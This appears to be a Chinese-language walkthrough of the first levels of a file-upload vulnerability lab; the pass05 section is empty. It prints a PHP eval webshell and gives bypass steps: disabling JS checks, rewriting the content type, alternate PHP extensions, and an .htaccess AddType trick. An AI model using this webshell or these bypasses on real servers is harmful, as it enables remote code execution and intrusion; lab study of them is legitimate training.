检查方式:
先说测试木马上传是否成功的检测方式(我使用的一句话木马为↓)
<?php @eval($_POST['pass']); ?>
①利用Hackbar发送一个POST指令“?pass=phpinfo();”
如果上传成功则会出现php版本信息
②使用中国蚁剑选择添加数据,输入链接URL,输入密码,选择测试连接。
如果上传成功则可以在蚁剑中查看靶机的所有数据内容
一、pass01
(1)首先我们尝试下上传一个php文件,发现文件类型被限制了
(2)查看源码
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
(3)发现是使用js代码对文件类型进行限制。
我们使用火狐浏览器默认的开发者工具,选择禁用js,然后上传PHP文件即可。
二、pass02
按照第一题的方法不能上传,我们尝试一下用抓包改包修改文件上传类型
(1)对上传过程进行抓包,修改连接类型,然后连接即可
三、pass03
发现前两题的办法均不能使用,查看源码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
可以看到代码使用黑名单来过滤,我们可以采用畸形文件名来解决,如:php、php3、php4、php5、phtml、pht这些后缀是可以被解析的,其他语言也有类似的情况,需要多次尝试
但我们需要配置Apache的httptd.conf文件
向该文件中结尾加入
AddType application/x-httpd-php .php .phtml .php5 .php3即可
步骤与第三题相同
四、pass04
第四题直接进制常见的.asp|.aspx|.php|.jsp等常见后缀文件,但是又一种文件格式没禁用,那就是
.htaccess
启用.htaccess,需要修改httpd.conf,启用AllowOverride(将该值改为all),并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。
然后先上传,htaccess文件,文件内容如下
AddType application/x-httpd-php jpg
.htaccess文件的内容的意思是 对2.jpg使用php重新解析
然后再上传jpg脚本(注意.htaccess文件不要添加前缀名,电脑无法解析)
五、pass05
六、pass06
观察源码我们可以发现,本题把.htaccess
文件也禁用了。但是认真对比与第四题的代码,本题去掉了大小写绕过的逃逸。